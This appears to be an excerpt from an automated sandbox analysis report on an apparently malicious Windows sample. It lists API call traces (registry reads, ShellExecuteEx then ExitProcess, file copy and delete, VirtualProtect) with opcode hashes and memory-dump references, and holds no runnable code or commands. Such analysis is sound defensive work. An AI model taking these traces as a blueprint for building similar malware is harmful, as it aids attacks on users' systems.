                                          • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                          • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValidmemset
                                          • String ID:
                                          • API String ID: 703783727-0
                                          • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                          • Instruction ID: b1b66c0af393fb712239824e55ca1d3d67ab2e75243c17e9d4cbdf9bdafd0db6
                                          • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                          • Instruction Fuzzy Hash: ED312B30A242929EDF259FF8C8542797FA09B06314B8841BBD883CF19AC778C405E762
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 022E6BD3
                                          • sscanf.NTDLL ref: 022E6C00
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C19
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C27
                                          • ExitProcess.KERNEL32 ref: 022E6C41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID:
                                          • API String ID: 2533653975-0
                                          • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                          • Instruction ID: eb3b71ad43b573599eead478bf84f8e489c540ff3c251f41f64a1c6ec8ece494
                                          • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                          • Instruction Fuzzy Hash: F221EBB5D14209AFCF08EFE4D9499EEB7BAFF48300F44952EE406A3254EB345604CB65
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                          • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                          • RegOpenKeyExA.ADVAPI32(80000002,00949E60,00000000,00020119,?), ref: 00417E5E
                                          • RegQueryValueExA.ADVAPI32(?,0097BA40,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                          • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3466090806-0
                                          • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                          • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E809E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E80A5
                                          • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022E80C5
                                          • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022E80E6
                                          • RegCloseKey.ADVAPI32(?), ref: 022E80F9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction ID: 1cfbfafacebd8db028af679e1c0ef27b95508f54e4dc37e628e7a89a8b328d39
                                          • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction Fuzzy Hash: 6C113DB5A94209BBDB10CFD4DD4AFBBB7B9EB05710F104219F616A7290C7B558008BA2
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E799B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E79A2
                                          • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022E7920), ref: 022E79C2
                                          • RegQueryValueExA.ADVAPI32(022E7920,00420AAC,00000000,00000000,?,000000FF), ref: 022E79E1
                                          • RegCloseKey.ADVAPI32(022E7920), ref: 022E79EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction ID: 56d574a23b1c796c7e6fce387c749d245cc72171ec3e13636da9deb623f7c15c
                                          • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction Fuzzy Hash: 850144B9A40308BFEB10DFE0DC49FAEB7B9EB48701F104159FA05A7280D67455008F51
                                          APIs
                                          • StrStrA.SHLWAPI(0097B780,?,?,?,0041140C,?,0097B780,00000000), ref: 0041926C
                                          • lstrcpyn.KERNEL32(0064AB88,0097B780,0097B780,?,0041140C,?,0097B780), ref: 00419290
                                          • lstrlenA.KERNEL32(?,?,0041140C,?,0097B780), ref: 004192A7
                                          • wsprintfA.USER32 ref: 004192C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpynlstrlenwsprintf
                                          • String ID: %s%s
                                          • API String ID: 1206339513-3252725368
                                          • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                          • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                          • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                          • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3466090806-0
                                          • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                          • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                          • RegCloseKey.ADVAPI32(?), ref: 022D1566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction ID: 63084d8a319a27892082af4f4125e024ba0b0ff5d856c36659a97c20f700532c
                                          • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction Fuzzy Hash: A50131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                          APIs
                                          • __getptd.LIBCMT ref: 0041C74E
                                            • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                            • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                          • __getptd.LIBCMT ref: 0041C765
                                          • __amsg_exit.LIBCMT ref: 0041C773
                                          • __lock.LIBCMT ref: 0041C783
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                          • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                          • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                          • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                          APIs
                                          • __getptd.LIBCMT ref: 022EC9B5
                                            • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                            • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                          • __getptd.LIBCMT ref: 022EC9CC
                                          • __amsg_exit.LIBCMT ref: 022EC9DA
                                          • __lock.LIBCMT ref: 022EC9EA
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 022EC9FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                          • Instruction ID: c7d4657104b6a573818c3436915559dddaa834fa843ce52a85352d05b71a7e59
                                          • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                          • Instruction Fuzzy Hash: 20F096329603119FDF30BBE8550276D3391AF14728FD0410BD417A71D8DBA45540FF5A
                                          APIs
                                          • StrCmpCA.SHLWAPI(00000000,009784C8), ref: 0041079A
                                          • StrCmpCA.SHLWAPI(00000000,00978608), ref: 00410866
                                          • StrCmpCA.SHLWAPI(00000000,00978678), ref: 0041099D
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: `_A
                                          • API String ID: 3722407311-2339250863
                                          • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                          • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                          • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                          • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                          APIs
                                          • StrCmpCA.SHLWAPI(00000000,009784C8), ref: 0041079A
                                          • StrCmpCA.SHLWAPI(00000000,00978608), ref: 00410866
                                          • StrCmpCA.SHLWAPI(00000000,00978678), ref: 0041099D
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: `_A
                                          • API String ID: 3722407311-2339250863
                                          • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                          • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                          • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                          • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                          • ExitProcess.KERNEL32 ref: 00416755
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                          • String ID: <
                                          • API String ID: 1148417306-4251816714
                                          • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                          • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                          • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                          • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022E68CA
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 022E698D
                                          • ExitProcess.KERNEL32 ref: 022E69BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                          • String ID: <
                                          • API String ID: 1148417306-4251816714
                                          • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                          • Instruction ID: e6fa43c86ec8a3706e9b48f3db0c3aa47226030db677f92b72f282516cf51e06
                                          • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                          • Instruction Fuzzy Hash: AB3149B1911308ABDB14EFD0DD85FEEB77AAF54300F805189E206A6194DF746B88CF69
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: @Jn@$Jn@$Jn@
                                          • API String ID: 544645111-1180188686
                                          • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                          • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                          • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                          • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                          APIs
                                          • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcatlstrcpy
                                          • String ID: vI@$vI@
                                          • API String ID: 3905823039-1245421781
                                          • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                          • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                          • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                          • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                          • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                          • wsprintfW.USER32 ref: 00418D78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocProcesswsprintf
                                          • String ID: %hs
                                          • API String ID: 659108358-2783943728
                                          • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                          • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                          • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                          • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                          • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                          • String ID:
                                          • API String ID: 257331557-0
                                          • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
